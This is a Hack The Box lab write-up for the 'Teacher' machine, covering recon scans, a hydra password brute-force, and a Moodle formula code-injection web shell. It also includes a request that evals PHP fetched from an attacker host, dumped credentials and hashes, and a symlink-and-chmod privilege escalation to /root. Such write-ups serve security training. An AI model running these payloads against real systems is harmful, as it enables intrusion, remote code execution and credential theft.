Writeup: Hack The Box - Machines - Teacher

Description

• Name: Teacher
• IP: 10.10.10.153
• Author: Gioo
• Difficulty: 4.2/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 10.10.10.153

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=12/23%OT=80%CT=1%CU=35687%PV=Y%DS=2%DC=T%G=Y%TM=5C1F90
OS:81%P=x86_64-unknown-linux-gnu)SEQ(SP=102%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS
OS:=8)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M
OS:54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=71
OS:20)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A
OS:%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y
OS:%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T
OS:=40%CD=S)

MOODLE:
[11:50:36] 301 -  310B  - /css  ->  http://10.10.10.153/css/
[11:50:38] 301 -  312B  - /fonts  ->  http://10.10.10.153/fonts/
[11:50:40] 301 -  313B  - /images  ->  http://10.10.10.153/images/
[11:50:40] 200 -    8KB - /index.html
[11:50:41] 301 -  317B  - /javascript  ->  http://10.10.10.153/javascript/
[11:50:41] 301 -  309B  - /js  ->  http://10.10.10.153/js/
[11:50:42] 301 -  313B  - /manual  ->  http://10.10.10.153/manual/
[11:50:43] 200 -  626B  - /manual/index.html
[11:50:43] 301 -  313B  - /moodle  ->  http://10.10.10.153/moodle/
[11:50:46] 403 -  297B  - /phpmyadmin
[11:50:46] 403 -  298B  - /phpmyadmin/
[11:50:46] 403 -  315B  - /phpmyadmin/scripts/setup.php
[11:50:48] 403 -  300B  - /server-status
[11:50:48] 403 -  301B  - /server-status/

[+] Plugins found:
    forum http://10.10.10.153/moodle/mod/forum/
        http://10.10.10.153/moodle/mod/forum/upgrade.txt
        http://10.10.10.153/moodle/mod/forum/version.php

[+] Themes found:
    bootstrapbase http://10.10.10.153/moodle/theme/bootstrapbase/
        http://10.10.10.153/moodle/theme/bootstrapbase/README.txt
        http://10.10.10.153/moodle/theme/bootstrapbase/upgrade.txt
        http://10.10.10.153/moodle/theme/bootstrapbase/version.php
    clean http://10.10.10.153/moodle/theme/clean/
        http://10.10.10.153/moodle/theme/clean/README.txt
        http://10.10.10.153/moodle/theme/clean/version.php
    more http://10.10.10.153/moodle/theme/more/
        http://10.10.10.153/moodle/theme/more/version.php

[+] Possible version(s):
    3.3.0
    3.3.0-beta
    3.3.0-rc1
    3.3.0-rc2
    3.3.0-rc3
    3.3.1
    3.3.2
    3.3.3
    3.3.4
    3.3.5
    3.3.6
    3.3.7

[+] Possible interesting urls found:
    Static readme file. - http://10.10.10.153/moodle/README.txt
    Admin panel - http://10.10.10.153/moodle/login/

Pwn

The website is using the CMS Moodle and in the gallery page it’s possible to see a crafted element:

Downloading 5.png shows a text:

http http://10.10.10.153/images/5.png

HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 200
Content-Type: image/png
Date: Sun, 23 Dec 2018 13:44:03 GMT
ETag: "c8-56f95bd633644"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 27 Jun 2018 01:43:21 GMT
Server: Apache/2.4.25 (Debian)

Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

Using hydra it’s possible to brute-force the login (http://10.10.10.153/moodle/login/index.php) finding the last missing character of the password for the user giovanni (Th4C00lTheacha#).

Once logged-in it’s possible to exploit the Moodle platform using a code injection in a formula form; this vulnerability is called Evil Teacher since abuse a non-privileged user to execute arbitrary code.

Following the POC is possible to create a web-shell inserting /*{a*/``$_GET[0]``;//{x}}.

And with the metasploit web_delivery module it’s easy to get a session:

http://10.10.10.153/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=16&wizardnow=datasetitems&cmid=7&0=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://10.10.XX.XX:8080/CglmLwY%27));%22

The session is with www-data user but we can head to the mysql to dump all password for the Moodle login. The mysql login password for root user is visible in the Moodle installation folder and is Welkom1!.

The list of found hashes:

username: guest
password: $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO
username: admin
password: $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2
username: giovanni
password: $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO
username: Giovannibak
password: 7a860966115182402ed06375cf0a22af

The last one is a MD5 hash and it’s the easier to crack. Using rockyou and hashcat the password is recovered: expelled.

This password can be used to su as giovanni from www-data.

As giovanni is possible to read the first flag and head to the privesc phase. Inside the /home/giovanni/work directory there are some file that suggest some backup script running on the system to save information about a course.

Searching with find / -name *backup* 2> /dev/null in /usr/bin/backup.sh jumps out a plsneverdo instruction.

giovanni@teacher:~$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

Creating a simple symbolic link with ln -s /root test it’s possible to exploit the chmod instruction to open up the permission for the /root directory allowing all user to read the flag.

After some minutes the script changed the permissions to /home/giovanni/work/tmp/test -> /root.